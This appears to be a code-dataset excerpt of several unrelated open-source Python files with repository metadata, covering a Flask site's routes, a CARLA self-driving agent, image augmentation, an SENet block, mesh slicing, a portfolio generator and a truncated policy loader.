A_LIST = [1, 2, 3, 4, 5]
print("2:")
print(pretty_json(A_LIST))
A_MIXED = [True, [1, 2, 3], "hello"]
print("3:")
print(pretty_json(A_MIXED))
A_MATRIX = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
print("4:")
print(pretty_json(A_MATRIX))
A_COMBINED = {
"layers": {
"ground": [
[1, 1, 1],
[2, 2, 2],
[3, 3, 3]
]
}
}
print(pretty_json(A_COMBINED))
print("5:")
A_DICT_OF_DICT = {"dA1": {"dB1": 5}, "dA2": [1, 2, 3, "hello"], "dA3": True}
print(pretty_json(A_DICT_OF_DICT))
print("Final:")
print(pretty_json(A_MAP.to_json()))
A_MAP.save("saved.map")
A_NEW_MAP = Map.from_json(None, "saved.map")
A_NEW_MAP.save("saved2.map")
print("With Unit:")
Unit = {'name': 'Content_Name', 'player': 'Meta_Player'}
A_MAP.add_layer('unit', 0, Unit)
A_MAP.set({"name": "kbot", "player": 1, "val": 28}, 3, 3, "unit")
A_MAP.info()
| 32.484058 | 88 | 0.510841 |
626190e0710277b6b898735fae9929f288d8a1e1 | 699 | py | Python | ruddock/routes.py | calebsander/RuddockWebsite | e6497bfdecffdfb712c36085fa1df93d08380dd2 | [
"MIT"
] | 7 | 2015-01-31T20:07:23.000Z | 2020-04-11T16:36:08.000Z | ruddock/routes.py | calebsander/RuddockWebsite | e6497bfdecffdfb712c36085fa1df93d08380dd2 | [
"MIT"
] | 103 | 2015-01-01T08:31:41.000Z | 2022-02-14T06:17:58.000Z | ruddock/routes.py | mply/RuddockWebsite | 63f1f25da5bef842b5b2337592186f8e23c1803b | [
"MIT"
] | 8 | 2017-10-01T07:27:34.000Z | 2020-05-04T01:49:30.000Z | import flask
from ruddock import app
from ruddock.auth_utils import is_full_member
from ruddock.decorators import login_required
try:
from ruddock import secrets
except ImportError:
from ruddock import default_secrets as secrets
@app.route('/')
def home():
"""The homepage of the site."""
return flask.render_template('index.html')
@app.route('/info')
@login_required()
def show_info():
"""Shows info page on door combos, printers, etc."""
return flask.render_template('info.html',
full_member=is_full_member(flask.session['username']),
secrets=secrets)
@app.route('/contact')
def show_contact():
"""Shows Contact Us page."""
return flask.render_template('contact.html')
| 24.964286 | 58 | 0.74392 |
84e2a271582ba900a100ccd0e86332f612553fd7 | 10,106 | py | Python | team_code/geometric_fusion_agent.py | Kait0/leaderboard | e44c169d541832439f98c70b33cfe6f7d89dfa31 | [
"MIT"
] | 447 | 2021-03-26T09:29:17.000Z | 2022-03-30T03:03:35.000Z | leaderboard/team_code/geometric_fusion_agent.py | Kin-Zhang/mmfn | 48a4817c9fb8bcf6ecb068e4c969e6b0c1a1a438 | [
"MIT"
] | 56 | 2021-04-21T03:12:50.000Z | 2022-03-30T13:34:16.000Z | leaderboard/team_code/geometric_fusion_agent.py | Kin-Zhang/mmfn | 48a4817c9fb8bcf6ecb068e4c969e6b0c1a1a438 | [
"MIT"
] | 82 | 2021-04-14T04:34:04.000Z | 2022-03-29T07:35:15.000Z | import os
import json
import datetime
import pathlib
import time
import cv2
import carla
from collections import deque
import torch
import carla
import numpy as np
from PIL import Image
from leaderboard.autoagents import autonomous_agent
from geometric_fusion.model import GeometricFusion
from geometric_fusion.config import GlobalConfig
from geometric_fusion.data import *
from team_code.planner import RoutePlanner
SAVE_PATH = os.environ.get('SAVE_PATH', None)
def get_entry_point():
return 'GeometricFusionAgent'
class GeometricFusionAgent(autonomous_agent.AutonomousAgent):
def setup(self, path_to_conf_file):
self.track = autonomous_agent.Track.SENSORS
self.config_path = path_to_conf_file
self.step = -1
self.wall_start = time.time()
self.initialized = False
self.input_buffer = {'rgb': deque(), 'rgb_left': deque(), 'rgb_right': deque(),
'rgb_rear': deque(), 'lidar': deque(), 'gps': deque(), 'thetas': deque()}
self.config = GlobalConfig()
self.net = GeometricFusion(self.config, 'cuda')
self.net.load_state_dict(torch.load(os.path.join(path_to_conf_file, 'best_model.pth')))
self.net.cuda()
self.net.eval()
self.save_path = None
if SAVE_PATH is not None:
now = datetime.datetime.now()
string = pathlib.Path(os.environ['ROUTES']).stem + '_'
string += '_'.join(map(lambda x: '%02d' % x, (now.month, now.day, now.hour, now.minute, now.second)))
print (string)
self.save_path = pathlib.Path(os.environ['SAVE_PATH']) / string
self.save_path.mkdir(parents=True, exist_ok=False)
(self.save_path / 'rgb').mkdir(parents=True, exist_ok=False)
(self.save_path / 'meta').mkdir(parents=True, exist_ok=False)
def _init(self):
self._route_planner = RoutePlanner(4.0, 50.0)
self._route_planner.set_route(self._global_plan, True)
self.initialized = True
def _get_position(self, tick_data):
gps = tick_data['gps']
gps = (gps - self._route_planner.mean) * self._route_planner.scale
return gps
def sensors(self):
return [
{
'type': 'sensor.camera.rgb',
'x': 1.3, 'y': 0.0, 'z':2.3,
'roll': 0.0, 'pitch': 0.0, 'yaw': 0.0,
'width': 400, 'height': 300, 'fov': 100,
'id': 'rgb'
},
{
'type': 'sensor.camera.rgb',
'x': 1.3, 'y': 0.0, 'z':2.3,
'roll': 0.0, 'pitch': 0.0, 'yaw': -60.0,
'width': 400, 'height': 300, 'fov': 100,
'id': 'rgb_left'
},
{
'type': 'sensor.camera.rgb',
'x': 1.3, 'y': 0.0, 'z':2.3,
'roll': 0.0, 'pitch': 0.0, 'yaw': 60.0,
'width': 400, 'height': 300, 'fov': 100,
'id': 'rgb_right'
},
{
'type': 'sensor.camera.rgb',
'x': -1.3, 'y': 0.0, 'z':2.3,
'roll': 0.0, 'pitch': 0.0, 'yaw': -180.0,
'width': 400, 'height': 300, 'fov': 100,
'id': 'rgb_rear'
},
{
'type': 'sensor.lidar.ray_cast',
'x': 1.3, 'y': 0.0, 'z': 2.5,
'roll': 0.0, 'pitch': 0.0, 'yaw': -90.0,
'id': 'lidar'
},
{
'type': 'sensor.other.imu',
'x': 0.0, 'y': 0.0, 'z': 0.0,
'roll': 0.0, 'pitch': 0.0, 'yaw': 0.0,
'sensor_tick': 0.05,
'id': 'imu'
},
{
'type': 'sensor.other.gnss',
'x': 0.0, 'y': 0.0, 'z': 0.0,
'roll': 0.0, 'pitch': 0.0, 'yaw': 0.0,
'sensor_tick': 0.01,
'id': 'gps'
},
{
'type': 'sensor.speedometer',
'reading_frequency': 20,
'id': 'speed'
}
]
def tick(self, input_data):
self.step += 1
rgb = cv2.cvtColor(input_data['rgb'][1][:, :, :3], cv2.COLOR_BGR2RGB)
rgb_left = cv2.cvtColor(input_data['rgb_left'][1][:, :, :3], cv2.COLOR_BGR2RGB)
rgb_right = cv2.cvtColor(input_data['rgb_right'][1][:, :, :3], cv2.COLOR_BGR2RGB)
rgb_rear = cv2.cvtColor(input_data['rgb_rear'][1][:, :, :3], cv2.COLOR_BGR2RGB)
gps = input_data['gps'][1][:2]
speed = input_data['speed'][1]['speed']
compass = input_data['imu'][1][-1]
lidar = input_data['lidar'][1][:, :3]
result = {
'rgb': rgb,
'rgb_left': rgb_left,
'rgb_right': rgb_right,
'rgb_rear': rgb_rear,
'lidar': lidar,
'gps': gps,
'speed': speed,
'compass': compass,
}
pos = self._get_position(result)
result['gps'] = pos
next_wp, next_cmd = self._route_planner.run_step(pos)
result['next_command'] = next_cmd.value
theta = compass + np.pi/2
R = np.array([
[np.cos(theta), -np.sin(theta)],
[np.sin(theta), np.cos(theta)]
])
local_command_point = np.array([next_wp[0]-pos[0], next_wp[1]-pos[1]])
local_command_point = R.T.dot(local_command_point)
result['target_point'] = tuple(local_command_point)
return result
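    # Worked example of the target-point transform above (added comment, not
    # original code), using generic numbers rather than simulator-specific
    # ones: with compass = 0 the rotation angle is theta = pi/2, so
    # R = [[0, -1], [1, 0]], and a world-frame offset of (1, 0) maps to
    # R.T.dot([1, 0]) = (0, -1), i.e. the next waypoint is re-expressed
    # relative to the vehicle's heading before being fed to the network.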
@torch.no_grad()
def run_step(self, input_data, timestamp):
if not self.initialized:
self._init()
tick_data = self.tick(input_data)
if self.step < self.config.seq_len:
rgb = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb']), crop=self.config.input_resolution)).unsqueeze(0)
self.input_buffer['rgb'].append(rgb.to('cuda', dtype=torch.float32))
if not self.config.ignore_sides:
rgb_left = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb_left']), crop=self.config.input_resolution)).unsqueeze(0)
self.input_buffer['rgb_left'].append(rgb_left.to('cuda', dtype=torch.float32))
rgb_right = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb_right']), crop=self.config.input_resolution)).unsqueeze(0)
self.input_buffer['rgb_right'].append(rgb_right.to('cuda', dtype=torch.float32))
if not self.config.ignore_rear:
rgb_rear = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb_rear']), crop=self.config.input_resolution)).unsqueeze(0)
self.input_buffer['rgb_rear'].append(rgb_rear.to('cuda', dtype=torch.float32))
self.input_buffer['lidar'].append(tick_data['lidar'])
self.input_buffer['gps'].append(tick_data['gps'])
self.input_buffer['thetas'].append(tick_data['compass'])
control = carla.VehicleControl()
control.steer = 0.0
control.throttle = 0.0
control.brake = 0.0
return control
gt_velocity = torch.FloatTensor([tick_data['speed']]).to('cuda', dtype=torch.float32)
command = torch.FloatTensor([tick_data['next_command']]).to('cuda', dtype=torch.float32)
tick_data['target_point'] = [torch.FloatTensor([tick_data['target_point'][0]]),
torch.FloatTensor([tick_data['target_point'][1]])]
target_point = torch.stack(tick_data['target_point'], dim=1).to('cuda', dtype=torch.float32)
encoding = []
rgb = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb']), crop=self.config.input_resolution)).unsqueeze(0)
self.input_buffer['rgb'].popleft()
self.input_buffer['rgb'].append(rgb.to('cuda', dtype=torch.float32))
if not self.config.ignore_sides:
rgb_left = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb_left']), crop=self.config.input_resolution)).unsqueeze(0)
self.input_buffer['rgb_left'].popleft()
self.input_buffer['rgb_left'].append(rgb_left.to('cuda', dtype=torch.float32))
rgb_right = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb_right']), crop=self.config.input_resolution)).unsqueeze(0)
self.input_buffer['rgb_right'].popleft()
self.input_buffer['rgb_right'].append(rgb_right.to('cuda', dtype=torch.float32))
if not self.config.ignore_rear:
rgb_rear = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb_rear']), crop=self.config.input_resolution)).unsqueeze(0)
self.input_buffer['rgb_rear'].popleft()
self.input_buffer['rgb_rear'].append(rgb_rear.to('cuda', dtype=torch.float32))
self.input_buffer['lidar'].popleft()
self.input_buffer['lidar'].append(tick_data['lidar'])
self.input_buffer['gps'].popleft()
self.input_buffer['gps'].append(tick_data['gps'])
self.input_buffer['thetas'].popleft()
self.input_buffer['thetas'].append(tick_data['compass'])
lidar_processed = list()
bev_points = list()
cam_points = list()
# transform the lidar point clouds to local coordinate frame
ego_theta = self.input_buffer['thetas'][-1]
ego_x, ego_y = self.input_buffer['gps'][-1]
for i, lidar_point_cloud in enumerate(self.input_buffer['lidar']):
curr_theta = self.input_buffer['thetas'][i]
curr_x, curr_y = self.input_buffer['gps'][i]
lidar_point_cloud[:,1] *= -1 # inverts x, y
lidar_transformed_np = transform_2d_points(lidar_point_cloud,
np.pi/2-curr_theta, -curr_x, -curr_y, np.pi/2-ego_theta, -ego_x, -ego_y)
lidar_transformed = torch.from_numpy(lidar_to_histogram_features(lidar_transformed_np, crop=self.config.input_resolution)).unsqueeze(0)
lidar_processed.append(lidar_transformed.to('cuda', dtype=torch.float32))
curr_bev_points, curr_cam_points = lidar_bev_cam_correspondences(lidar_transformed_np, crop=self.config.input_resolution)
bev_points.append(torch.from_numpy(curr_bev_points).unsqueeze(0))
cam_points.append(torch.from_numpy(curr_cam_points).unsqueeze(0))
bev_points = bev_points[0].long().to('cuda', dtype=torch.int64)
cam_points = cam_points[0].long().to('cuda', dtype=torch.int64)
pred_wp = self.net(self.input_buffer['rgb'] + self.input_buffer['rgb_left'] + \
self.input_buffer['rgb_right']+self.input_buffer['rgb_rear'], \
lidar_processed, target_point, gt_velocity, bev_points, cam_points)
steer, throttle, brake, metadata = self.net.control_pid(pred_wp, gt_velocity)
self.pid_metadata = metadata
if brake < 0.05: brake = 0.0
if throttle > brake: brake = 0.0
control = carla.VehicleControl()
control.steer = float(steer)
control.throttle = float(throttle)
control.brake = float(brake)
if SAVE_PATH is not None and self.step % 10 == 0:
self.save(tick_data)
return control
def save(self, tick_data):
frame = self.step // 10
Image.fromarray(tick_data['rgb']).save(self.save_path / 'rgb' / ('%04d.png' % frame))
outfile = open(self.save_path / 'meta' / ('%04d.json' % frame), 'w')
json.dump(self.pid_metadata, outfile, indent=4)
outfile.close()
def destroy(self):
del self.net
| 35.090278 | 143 | 0.671581 |
ba88aa279e0c9d9fc77b828de5aac0f42e7676cf | 5,625 | py | Python | mmdet/datasets/extra_aug.py | daniel616/DL | b62087bb86bcfa4cdaa692bb0ae724d416761de3 | [
"Apache-2.0"
] | 2 | 2020-03-22T14:27:38.000Z | 2020-06-20T02:35:14.000Z | mmdet/datasets/extra_aug.py | daniel616/DL | b62087bb86bcfa4cdaa692bb0ae724d416761de3 | [
"Apache-2.0"
] | null | null | null | mmdet/datasets/extra_aug.py | daniel616/DL | b62087bb86bcfa4cdaa692bb0ae724d416761de3 | [
"Apache-2.0"
] | null | null | null | import mmcv
import numpy as np
from numpy import random
from mmdet.core.evaluation.bbox_overlaps import bbox_overlaps
class PhotoMetricDistortion(object):
def __init__(self,
brightness_delta=32,
contrast_range=(0.5, 1.5),
saturation_range=(0.5, 1.5),
hue_delta=18):
self.brightness_delta = brightness_delta
self.contrast_lower, self.contrast_upper = contrast_range
self.saturation_lower, self.saturation_upper = saturation_range
self.hue_delta = hue_delta
def __call__(self, img, boxes, labels):
# random brightness
if random.randint(2):
delta = random.uniform(-self.brightness_delta,
self.brightness_delta)
img += delta
        # mode == 1 --> do random contrast first
        # mode == 0 --> do random contrast last
mode = random.randint(2)
if mode == 1:
if random.randint(2):
alpha = random.uniform(self.contrast_lower,
self.contrast_upper)
img *= alpha
# convert color from BGR to HSV
img = mmcv.bgr2hsv(img)
# random saturation
if random.randint(2):
img[..., 1] *= random.uniform(self.saturation_lower,
self.saturation_upper)
# random hue
if random.randint(2):
img[..., 0] += random.uniform(-self.hue_delta, self.hue_delta)
img[..., 0][img[..., 0] > 360] -= 360
img[..., 0][img[..., 0] < 0] += 360
# convert color from HSV to BGR
img = mmcv.hsv2bgr(img)
# random contrast
if mode == 0:
if random.randint(2):
alpha = random.uniform(self.contrast_lower,
self.contrast_upper)
img *= alpha
# randomly swap channels
if random.randint(2):
img = img[..., random.permutation(3)]
return img, boxes, labels
class Expand(object):
def __init__(self, mean=(0, 0, 0), to_rgb=True, ratio_range=(1, 4)):
if to_rgb:
self.mean = mean[::-1]
else:
self.mean = mean
self.min_ratio, self.max_ratio = ratio_range
def __call__(self, img, boxes, labels):
if random.randint(2):
return img, boxes, labels
h, w, c = img.shape
ratio = random.uniform(self.min_ratio, self.max_ratio)
expand_img = np.full((int(h * ratio), int(w * ratio), c),
self.mean).astype(img.dtype)
left = int(random.uniform(0, w * ratio - w))
top = int(random.uniform(0, h * ratio - h))
expand_img[top:top + h, left:left + w] = img
img = expand_img
boxes += np.tile((left, top), 2)
return img, boxes, labels
class RandomCrop(object):
def __init__(self, min_ious=(0.1, 0.3, 0.5, 0.7, 0.9), min_crop_size=0.3):
# 1: return ori img
self.sample_mode = (1, *min_ious, 0)
self.min_crop_size = min_crop_size
def __call__(self, img, boxes, labels):
h, w, c = img.shape
while True:
mode = random.choice(self.sample_mode)
if mode == 1:
return img, boxes, labels
min_iou = mode
for i in range(50):
new_w = random.uniform(self.min_crop_size * w, w)
new_h = random.uniform(self.min_crop_size * h, h)
# h / w in [0.5, 2]
if new_h / new_w < 0.5 or new_h / new_w > 2:
continue
left = random.uniform(w - new_w)
top = random.uniform(h - new_h)
patch = np.array((int(left), int(top), int(left + new_w),
int(top + new_h)))
overlaps = bbox_overlaps(
patch.reshape(-1, 4), boxes.reshape(-1, 4)).reshape(-1)
if overlaps.min() < min_iou:
continue
# center of boxes should inside the crop img
center = (boxes[:, :2] + boxes[:, 2:]) / 2
mask = (center[:, 0] > patch[0]) * (
center[:, 1] > patch[1]) * (center[:, 0] < patch[2]) * (
center[:, 1] < patch[3])
if not mask.any():
continue
boxes = boxes[mask]
labels = labels[mask]
# adjust boxes
img = img[patch[1]:patch[3], patch[0]:patch[2]]
boxes[:, 2:] = boxes[:, 2:].clip(max=patch[2:])
boxes[:, :2] = boxes[:, :2].clip(min=patch[:2])
boxes -= np.tile(patch[:2], 2)
return img, boxes, labels
class Rotate():
pass
class ExtraAugmentation(object):
def __init__(self,
photo_metric_distortion=None,
expand=None,
random_crop=None):
self.transforms = []
if photo_metric_distortion is not None:
self.transforms.append(
PhotoMetricDistortion(**photo_metric_distortion))
if expand is not None:
self.transforms.append(Expand(**expand))
if random_crop is not None:
self.transforms.append(RandomCrop(**random_crop))
def __call__(self, img, boxes, labels):
img = img.astype(np.float32)
for transform in self.transforms:
img, boxes, labels = transform(img, boxes, labels)
return img, boxes, labels
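# Composition sketch (illustrative, not part of the original file): the dicts
# mirror the constructor arguments defined above, and the mean/ratio/IoU
# numbers are example values only.
#
#     extra_aug = ExtraAugmentation(
#         photo_metric_distortion=dict(brightness_delta=32,
#                                      contrast_range=(0.5, 1.5)),
#         expand=dict(mean=(123.675, 116.28, 103.53), to_rgb=True,
#                     ratio_range=(1, 2)),
#         random_crop=dict(min_ious=(0.5, 0.7), min_crop_size=0.3))
#     img, boxes, labels = extra_aug(img, boxes, labels)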
| 33.885542 | 78 | 0.510756 |
4344bf84902ac046295d960da163cb68fcc97210 | 1,705 | py | Python | ntire2021/models/senet.py | solcummings/ntire2021-sar | 25d60874632135daf39805837b850bba46c3f3a5 | [
"Apache-2.0"
] | null | null | null | ntire2021/models/senet.py | solcummings/ntire2021-sar | 25d60874632135daf39805837b850bba46c3f3a5 | [
"Apache-2.0"
] | null | null | null | ntire2021/models/senet.py | solcummings/ntire2021-sar | 25d60874632135daf39805837b850bba46c3f3a5 | [
"Apache-2.0"
] | null | null | null | import torch
import torch.nn as nn
from models.model_base import InitializationMixin
class SENet(nn.Module, InitializationMixin):
"""
SENet from arXiv:1709.01507 Squeeze-and-Excitation Networks
Notes
-----
Related papers
Spatial SE arXiv:1803.02579 Concurrent Spatial and Channel Squeeze & Excitation in
Fully Convolutional Networks
"""
def __init__(self, classes, img_channels, model_depth, arch_config=None,
pretrained=False):
super().__init__()
pass
def forward(self, x):
pass
class SEBlock(nn.Module):
def __init__(self, in_channels, mid_channels, act=nn.ReLU(inplace=True),
sigmoid=nn.Sigmoid(), **kwargs):
super().__init__()
self.in_channels = in_channels
self.mid_channels = mid_channels
self.out_channels = in_channels
self.block = self.__configure(act, sigmoid)
def forward(self, x):
out = self.block(x)
return out * x
def __configure(self, act, sigmoid):
# "Removing the biases of the FC layers in the excitation operation
# facilitates the modelling of channel dependencies..." p.8
se_block = nn.Sequential(
nn.AdaptiveAvgPool2d(1),
nn.Conv2d(self.in_channels, self.mid_channels, 1, bias=True),
act,
nn.Conv2d(self.mid_channels, self.out_channels, 1, bias=True),
sigmoid,
)
return se_block
if __name__ == '__main__':
torch.manual_seed(0)
se_block = SEBlock(64, 64 // 16, act=torch.nn.ReLU6(inplace=True))
x = torch.ones(1, 64, 32, 32)
out = se_block(x)
print(out)
print(out.shape)
| 27.95082 | 86 | 0.628739 |
678aa82788b96892d585cbcfea4bbbc98bdb75ef | 3,185 | py | Python | xray/slice.py | jtgrassel/xray | 684860bc268d7475a07f4754a4ec9c03889e4d68 | [
"MIT"
] | null | null | null | xray/slice.py | jtgrassel/xray | 684860bc268d7475a07f4754a4ec9c03889e4d68 | [
"MIT"
] | null | null | null | xray/slice.py | jtgrassel/xray | 684860bc268d7475a07f4754a4ec9c03889e4d68 | [
"MIT"
] | 3 | 2021-08-14T12:20:26.000Z | 2021-09-21T21:05:58.000Z | import math
import numpy as np
def manhattan_distance(p1, p2, d=2):
assert (len(p1) == len(p2))
all_distance = 0
for i in range(d):
all_distance += abs(p1[i] - p2[i])
return all_distance
def to_intersecting_lines(mesh, height):
# find relevant triangles
mask = np.zeros(len(mesh))
z_val = mesh[:, 2::3]
above = z_val > height
below = z_val < height
same = z_val == height
row_sum = same.sum(axis=1)
mask[row_sum == 3] = 1
mask[row_sum == 2] = 1
mask[np.any(above, axis=1) & np.any(below, axis=1)] = 1
# find intersecting triangles
    not_same_triangles = mesh[mask.astype(bool) & ~np.all(same, axis=1)].reshape(-1, 3, 3)
# TODO: Make the following line faster
lines = list(map(lambda tri: triangle_to_intersecting_lines(tri, height), not_same_triangles))
return lines
def draw_line_on_pixels(p1, p2, pixels):
line_steps = math.ceil(manhattan_distance(p1, p2))
if line_steps == 0:
pixels[int(p1[0]), int(p2[1])] = True
return
for j in range(line_steps + 1):
point = linear_interpolation(p1, p2, j / line_steps)
pixels[int(point[0]), int(point[1])] = True
def linear_interpolation(p1, p2, distance):
'''
:param p1: Point 1
:param p2: Point 2
:param distance: Between 0 and 1, Lower numbers return points closer to p1.
:return: A point on the line between p1 and p2
'''
slopex = (p1[0] - p2[0])
slopey = (p1[1] - p2[1])
slopez = p1[2] - p2[2]
return (
p1[0] - distance * slopex,
p1[1] - distance * slopey,
p1[2] - distance * slopez
)
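# Worked example for the helper above (added comment, not original code):
# linear_interpolation((0, 0, 0), (10, 10, 10), 0.5) returns (5.0, 5.0, 5.0);
# distance=0 returns p1 itself and distance=1 returns p2.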
def triangle_to_intersecting_lines(triangle, height):
assert (len(triangle) == 3)
above = triangle[triangle[:, 2] > height]
below = triangle[triangle[:, 2] < height]
same = triangle[triangle[:, 2] == height]
assert len(same) != 3
if len(same) == 2:
return same[0], same[1]
elif len(same) == 1:
side1 = where_line_crosses_z(above[0], below[0], height)
return side1, same[0]
else:
lines = []
for a in above:
for b in below:
lines.append((b, a))
side1 = where_line_crosses_z(lines[0][0], lines[0][1], height)
side2 = where_line_crosses_z(lines[1][0], lines[1][1], height)
return side1, side2
def where_line_crosses_z(p1, p2, z):
if p1[2] > p2[2]:
t = p1
p1 = p2
p2 = t
# now p1 is below p2 in z
if p2[2] == p1[2]:
distance = 0
else:
distance = (z - p1[2]) / (p2[2] - p1[2])
return linear_interpolation(p1, p2, distance)
# Deprecated
def calculate_scale_shift(mesh, resolution):
all_points = mesh.reshape(-1, 3)
mins = all_points.min(axis=0)
maxs = all_points.max(axis=0)
del all_points
shift = -1 * mins
xy_scale = float(resolution - 1) / (max(maxs[0] - mins[0], maxs[1] - mins[1]))
# TODO: Change this to return one scale. If not, verify svx exporting still works.
scale = [xy_scale, xy_scale, xy_scale]
bounding_box = [resolution, resolution, math.ceil((maxs[2] - mins[2]) * xy_scale)]
return scale, shift, bounding_box
| 30.333333 | 98 | 0.600314 |
a7532beb454de9fdc73c8fd567ef6b46a0f5b32f | 999 | py | Python | tests/unit/test_scriptgenerator.py | tksn/phoneauto | 9b92226c5c5eeb606f4b3c462a8b654454eb203d | [
"MIT"
] | null | null | null | tests/unit/test_scriptgenerator.py | tksn/phoneauto | 9b92226c5c5eeb606f4b3c462a8b654454eb203d | [
"MIT"
] | null | null | null | tests/unit/test_scriptgenerator.py | tksn/phoneauto | 9b92226c5c5eeb606f4b3c462a8b654454eb203d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from mock import Mock
from phoneauto.scriptgenerator import scriptgenerator
def create_scriptgenerator():
d = Mock()
d.get_screenshot_as_file = Mock()
f = Mock()
f.find_object_contains = Mock()
conf = {
'devices': [d],
'coder': Mock(),
'finder': f,
'writer': Mock()
}
return scriptgenerator.ScriptGenerator(conf)
def test_get_screenshot():
g = create_scriptgenerator()
g.devices[0].get_screenshot_as_file.return_value = False
assert g.execute('get_screenshot') is None
def test_swipe_object_with_horiz_direction():
g = create_scriptgenerator()
g.execute('swipe_object_with_direction', {
'start': (0, 0), 'end': (0, 30)
})
_, findobj_kwargs = g.finder.find_object_contains.call_args
_, swipe_kwargs = g.devices[0].swipe_object.call_args
assert findobj_kwargs['coord'] == (0, 0)
assert swipe_kwargs['direction'] == 'down'
| 27 | 63 | 0.66967 |
17b1b72000da4f244e949e8f4c906de1d176c084 | 3,425 | py | Python | mockportfolio/holdings.py | smacken/mockportfolio | bb7ef73ba19be52e22adf5b22e30fd1e9e0e585f | [
"MIT"
] | null | null | null | mockportfolio/holdings.py | smacken/mockportfolio | bb7ef73ba19be52e22adf5b22e30fd1e9e0e585f | [
"MIT"
] | 297 | 2019-10-21T17:26:33.000Z | 2021-07-19T17:19:23.000Z | mockportfolio/holdings.py | smacken/trading-mock-portfolio | bb7ef73ba19be52e22adf5b22e30fd1e9e0e585f | [
"MIT"
] | null | null | null | '''holdings generator'''
import pandas as pd
from pypfopt.efficient_frontier import EfficientFrontier
from pypfopt import risk_models
from pypfopt import expected_returns
from pypfopt.discrete_allocation import DiscreteAllocation, get_latest_prices
from .prices import Prices
class Holdings(object):
''' trading holdings generator '''
def __init__(self, data_path='data/'):
self.data_path = data_path
def generate(self, total=10000, start='2017-01-09', end='2018-12-27'):
''' generate holdings history frame '''
p = Prices(self.data_path)
portfolio = self.portfolio(start)
holding_folio = {}
months = [p.next_weekday(x).strftime('%Y-%m-%d') for x in p.monthlist([start, end])]
months.append(end)
for month in months:
            # rebalance portfolio / adjust holdings
price_pivot = portfolio.loc[start:month]
if len(price_pivot.index) < 10:
continue
allocation = self.build_portfolio(price_pivot, total)
holding_folio[month] = allocation
return holding_folio
def listings(self):
''' get a dataframe of all listed tickers '''
df = pd.read_csv(f'{self.data_path}ASXListedCompanies.csv', skiprows=[0, 1])
df.rename(
columns={
'Company name': 'Name',
'ASX code': 'Tick',
'GICS industry group': 'Industry'
}, inplace=True)
return df
def random_ticks(self, tickers, tick_count=10):
''' get a list of random tickers from the listings '''
df = tickers.sample(n=tick_count)
return df
def build_portfolio(self, price_pivot, portfolio_total=10000):
''' build a portfolio from price data'''
mu = expected_returns.mean_historical_return(price_pivot)
shrink = risk_models.CovarianceShrinkage(price_pivot)
S = shrink.ledoit_wolf()
ef = EfficientFrontier(mu, S, weight_bounds=(0, 0.2), gamma=0.8)
weights = ef.max_sharpe()
weights = ef.clean_weights()
latest_prices = get_latest_prices(price_pivot)
weights = {k: v for k, v in weights.items() if weights[k] > 0.0}
da = DiscreteAllocation(weights, latest_prices, total_portfolio_value=portfolio_total)
allocation, leftover = da.lp_portfolio()
# print("Discrete allocation:", allocation)
return allocation
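    # Usage sketch (added comment, not part of the original class): price_pivot
    # is expected to be a date-indexed frame with one close-price column per
    # ticker, e.g. the frame returned by portfolio() below; the dates and total
    # are example values.
    #
    #     h = Holdings('data/')
    #     prices = h.portfolio('2017-01-09')
    #     allocation = h.build_portfolio(prices, portfolio_total=10000)
    #     # -> {'TICK': share_count, ...}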
def portfolio(self, date_start, portfolio_size=10):
''' build a random portfolio of prices, presented in pivot '''
ticks = self.random_ticks(self.listings())
prices = Prices(self.data_path)
tick_prices = prices.update(ticks.Tick.values, date_start)
tick_prices = tick_prices[tick_prices.Tick.isin(ticks.Tick.values.tolist())]
tickers = tick_prices.Tick.unique()
if len(tickers) < portfolio_size:
# add additional random ticks
remaining = portfolio_size - len(tickers)
additional = self.random_ticks(self.listings(), remaining)
add_prices = prices.update(additional.Tick.values, date_start)
add_prices = add_prices[add_prices.Tick.isin(additional.Tick.values.tolist())]
tick_prices = pd.concat([tick_prices, add_prices])
price_pivot = tick_prices.pivot(index='Date', columns='Tick', values='Close')
return price_pivot
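# Illustrative usage sketch (the import path and the presence of price CSVs under data/
# are assumptions, and the ticker symbols in the result are made up):
#
#   from mockportfolio.holdings import Holdings
#   h = Holdings(data_path='data/')
#   folio_history = h.generate(total=10000, start='2017-01-09', end='2018-12-27')
#   # folio_history maps rebalance dates to discrete share allocations,
#   # e.g. {'2017-02-06': {'ABC': 12, 'XYZ': 40}, ...}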
| 42.8125 | 94 | 0.645255 |
a8e107a7d749b8d5977393ece0712ad1afdb031e | 4,643 | py | Python | src/ion/process/bootstrap/load_system_policy.py | scionrep/scioncc_new | 086be085b69711ee24c4c86ed42f2109ca0db027 | [
"BSD-2-Clause"
] | 2 | 2015-10-05T20:36:35.000Z | 2018-11-21T11:45:24.000Z | src/ion/process/bootstrap/load_system_policy.py | scionrep/scioncc_new | 086be085b69711ee24c4c86ed42f2109ca0db027 | [
"BSD-2-Clause"
] | 21 | 2015-03-18T14:39:32.000Z | 2016-07-01T17:16:29.000Z | src/ion/process/bootstrap/load_system_policy.py | scionrep/scioncc_new | 086be085b69711ee24c4c86ed42f2109ca0db027 | [
"BSD-2-Clause"
] | 12 | 2015-03-18T10:53:49.000Z | 2018-06-21T11:19:57.000Z | #!/usr/bin/env python
"""Process that loads the system policy"""
__author__ = 'Stephen P. Henrie, Michael Meisinger'
import os
import yaml
from pyon.core.exception import ContainerConfigError
from pyon.core.governance import get_system_actor, get_system_actor_header
from pyon.public import CFG, log, ImmediateProcess, IonObject, RT, OT, BadRequest
from interface.services.core.iorg_management_service import OrgManagementServiceProcessClient
from interface.services.core.ipolicy_management_service import PolicyManagementServiceProcessClient
class LoadSystemPolicy(ImmediateProcess):
"""
bin/pycc -x ion.process.bootstrap.load_system_policy.LoadSystemPolicy op=load
"""
def on_init(self):
pass
def on_start(self):
op = self.CFG.get("op", None)
log.info("LoadSystemPolicy: {op=%s}" % op)
if op:
if op == "load":
self.op_load_system_policies(self)
else:
raise BadRequest("Operation unknown")
else:
raise BadRequest("No operation specified")
def on_quit(self):
pass
@classmethod
def op_load_system_policies(cls, calling_process):
